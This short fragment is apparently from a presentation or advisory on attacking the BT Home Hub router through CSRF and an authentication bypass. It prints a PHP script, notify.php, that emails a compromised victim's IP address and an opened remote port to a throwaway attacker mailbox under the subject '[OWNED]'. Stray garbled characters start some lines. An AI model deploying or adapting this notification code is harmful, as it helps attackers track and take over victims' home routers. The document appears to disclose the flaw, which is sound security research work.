PWNING BT HOME HUB: CSRF + AUTH BYPASS
çAttacker is notified via email
¼<?php
// notify.php
define("RCPT_EMAIL", "bthomehubevil@mailinator.com"); define("EMAIL_SUBJECT", "[OWNED]"); $messagebody="victim: https://".$_SERVER['REMOTE_ADDR'].":51003\n"; mail(RCPT_EMAIL, EMAIL_SUBJECT, $messagebody);
?>